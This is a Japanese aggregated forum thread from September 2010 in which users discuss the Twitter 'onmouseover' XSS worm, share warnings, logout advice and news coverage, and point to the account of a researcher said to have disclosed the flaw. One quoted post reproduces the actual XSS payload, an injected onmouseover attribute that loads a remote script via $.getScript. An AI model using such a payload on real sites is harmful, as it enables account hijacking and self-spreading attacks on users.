34 comments このエントリーをはてなブックマークに追加
30:弁理士(アラバマ州) [sage]:2010/09/21(火) 21:02:19.50 ID:s7f4bffA0
【今北用まとめ】変な外人がTwitter.comの脆弱性を突いて
変なスクリプトorプログラムを悪意を持って仕掛ける→
それが発動→本家Twitterでやってる人やログインしっぱなしの
人が多数被害を受ける→個人情報がもってかれるので注意が喚起されまくっている←今ここ


126:落語家(東京都) [sage]:2010/09/21(火) 21:29:27.89 ID:R0XqcxST0

【バグった人向け】祭りにも関わらず対処法も分からないまま
TwitterをWebで見てしまってどうしようもない状態になった方々

http://twitter.com/account/logout
直接これにアクセスして素直にログアウトしましょう。

80:キチガイ(鹿児島県) []:2010/09/21(火) 21:16:40.41 ID:Zjmb5YyA0
おい誰か3行で説明しろ

85:落語家(東京都) [sage]:2010/09/21(火) 21:18:50.82 ID:R0XqcxST0
>>80
Twitterを専用ソフトや携帯電話でなく、一般のホームページから閲覧している皆さまに。
カーソルを乗せるだけで自動的に心当たりの無いツイートを書き込んだり、リツイートをしたりする罠が出回っています。
ご注意ください。ブラウザで見ないでください。


91:演出家(岡山県) [sage]:2010/09/21(火) 21:20:09.12 ID:sD++XEJf0
>>80
ttp://kissho.xii.jp/1/src/1jyou124514.jpg

1jyou124514

94:Opera最強伝説(埼玉県) []:2010/09/21(火) 21:21:13.00 ID:648O78yM0
>>91
TVで見たウイルス!って感じでマジでカッコイイw


112:鵜飼い(東京都) [sage]:2010/09/21(火) 21:24:01.74 ID:rU2nZUIk0
>>91
なにこれ楽しそう
感染してるIDの人のツイートだとこうなるってことか?


115:落語家(東京都) [sage]:2010/09/21(火) 21:25:34.59 ID:R0XqcxST0
>>112
いくつかパターンがあって、このあと砂嵐画面になったり画面中央に初音ミクのモザイクが出たりする


516:指揮者(千葉県) [sage]:2010/09/21(火) 22:18:05.11 ID:ZN/Xj7x+P
http://m5s.jp/tw/xssvul/
今回の簡単な説明な


542:FR-F1(広島県) []:2010/09/21(火) 22:20:53.58 ID:G+Ngtw6N0
>>516
分かりやすい
これなら猿でも理解できる


768:軍人(福岡県) []:2010/09/21(火) 22:41:02.78 ID:nOM0Fv/E0
>>516
インターネットエクスプロラーってなんだよ?


20:演出家(岡山県) [sage]:2010/09/21(火) 20:57:10.05 ID:sD++XEJf0
369名前:友達の友達の名無しさん[sage]投稿日:2010/09/21(火) 20:46:56 ID:mxH+nvz80 [2/3]
取り敢えず犯人はこれなんだろうか(実物はt.coの前にhttpがあるけど省略)

t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')"/

で、これってどういう意味?

371 名前:友達の友達の名無しさん[] 投稿日:2010/09/21(火) 20:48:07 ID:wOsZ3dM8P [1/2]
>>369
マウスをのせるだけでフォントサイズ999999999999のツイートをしますってこと

21:歯科医師(関西地方) [sage]:2010/09/21(火) 20:58:17.65 ID:6PM295IO0
>>20
なるほど、そういうことができるわけか。


27:演出家(岡山県) [sage]:2010/09/21(火) 20:59:32.66 ID:sD++XEJf0
>>21
他、勝手にフォローしたりDM送ったり色々何でもできるくさい


32:絵本作家(catv?) []:2010/09/21(火) 21:03:01.18 ID:N9k777o3i?BRZ(10000)
>>27
ワームも登場したっぽい


880:芸人(東京都) []:2010/09/21(火) 22:50:27.38 ID:ywc7cRDWP
tweenも駄目とかいうツイート流れてきたんだけど、問題ないよなあ?

884:ホスト(大阪府) [sage]:2010/09/21(火) 22:50:46.44 ID:/9kpSi/70
>>880
嘘ついてんじゃねーよカスがっていっとけばいいよ


897:グラウンドキーパー(東京都) [sage]:2010/09/21(火) 22:51:35.90ID:YOPbxu3B0
>>880
tweenじゃスクリプト動かないだろ・・・


900:社員(東京都) []:2010/09/21(火) 22:51:48.94 ID:BEyW/5l30
>>880
製作者から安全宣言出てる
http://sourceforge.jp/projects/tween/wiki/FrontPage


121:相場師(神奈川県) []:2010/09/21(火) 21:28:04.64 ID:mcZjuARE0
他人のツイートとか読んでないクールな俺気取ってたのに読んでるのバレたわ

125:探検家(長屋) [sage]:2010/09/21(火) 21:29:13.31 ID:+4VQExQA0
毎日新聞とかどっかの大学教授とか
フォロワー数数十万以上のアカウントが続々ひっかかってる。
それらのツイートをWEBで開いた人たちも続々…。


130:はり師(群馬県) [sage]:2010/09/21(火) 21:30:16.34 ID:+Xt1vcmG0
>>125
もう止まらんな


389:落語家(愛知県) [sage]:2010/09/21(火) 22:06:57.10 ID:Tzu9mMDs0
海外でも広まってきたぞ
警告ツイートが流れてきた

  RT @BreakingNews: RT @thedailybeast: Warning: Twitter has been hacked.
    Do not 'roll over' any links on Twitter web interface; use3rd-party client for now

  Twitter flaw pumps out spam links http://bbc.in/bDaGDF


533:たこ焼き(アラバマ州) []:2010/09/21(火) 22:20:02.19 ID:oqL9Uryx0
>>389
なんかワクワクしてきたぞwwww


876:指揮者(東京都) []:2010/09/21(火) 22:50:00.68 ID:cx3T5MDpP
CNNきたよ

'Mouse over' security flaw causes Twitter trouble - CNN.com
http://edition.cnn.com/2010/TECH/social.media/09/21/twitter.security.flaw/index.html?on.cnn=1

814:彫刻家(アラバマ州) [sage]:2010/09/21(火) 22:45:14.09 ID:BeDe0tlj0
BBCでも取り上げられててワロタ
http://www.bbc.co.uk/news/technology-11382469


832:脚本家(長野県) [sage]:2010/09/21(火) 22:46:40.95 ID:+LBpRpJH0
>>814
日本ではまだ取り上げられてないのか?


851:メイド(福岡県) []:2010/09/21(火) 22:48:02.42 ID:icERWXR40
>>832
http://www.itmedia.co.jp/news/articles/1009/21/news111.html


304: かまってちゃん(神奈川県) []:2010/09/21(火) 23:16:36.04 ID:yEcDpu0x0
で、こいつどうすんだよw 放置でおk?

http://twitter.com/kinugawamasato
↑犯人

http://d.hatena.ne.jp/masatokinugawa/20100623/twitter_xss
> kinugawamasato Masato Kinugawa
> クリティカルな問題でありながら報告後長らく修正されなかったこと、
> さらにツイッター側が自ら脆弱性を公開したままにしており問題意識が
> あまりにも低いことなどを考慮して、背後で巧妙に悪用されるよりは早急
> に問題の重大さを認識させ対策させた方がいいだろうという判断で虹を
> 架けさせて頂きました

308: 石工(岡山県) []:2010/09/21(火) 23:18:54.72 ID:06zOk/Tb0
>>304
いいやつじゃねーかwwwww


310: 幼稚園の先生(千葉県) []:2010/09/21(火) 23:20:18.05 ID:gH98ZY0s0
>>304
結果的にアウトw


313: 詩人(宮城県) [sage]:2010/09/21(火) 23:22:00.71 ID:BgMxgWwz0
>>304
犯人が日本人だとは誰も予想しなかった


54: AV男優(関西地方) []:2010/09/21(火) 23:54:55.48 ID:ocSnQ5LY0
>>36
こういうのって割とどんなWebサービスにも湧くんだけど、実際どうなん
放置?


62: 芸人(dion軍) []:2010/09/21(火) 23:56:16.95 ID:iuqTZchtP
>>54
垢バンして終わり


844:絵本作家(埼玉県) [sage]:2010/09/21(火) 22:47:37.16 ID:8bLLBNMz0
ttp://www.youtube.com/watch?v=IOtszwNajiw



878:指揮者(dion軍) [sage]:2010/09/21(火) 22:50:16.70 ID:Qsv2n+JEP
>>844
感動した、ツイッターやってくる


983:評論家(埼玉県) []:2010/09/21(火) 22:57:15.20 ID:35txBi010
>>844
なんかちょっとカッコいいw



twitterでXSS脆弱性発生
http://kamome.2ch.net/test/read.cgi/news/1285069734/


【追記】
修正された?みたいです。
Twitter公式ブログが脆弱性の修正を報告(英文)。
だが全Twitterサーバに修正が反映されるまで時間がかかる可能性もあるため、当分は要注意。
Twitterの脆弱性突くコードが拡散 Webブラウザでのアクセス自粛呼び掛け -ITmedia News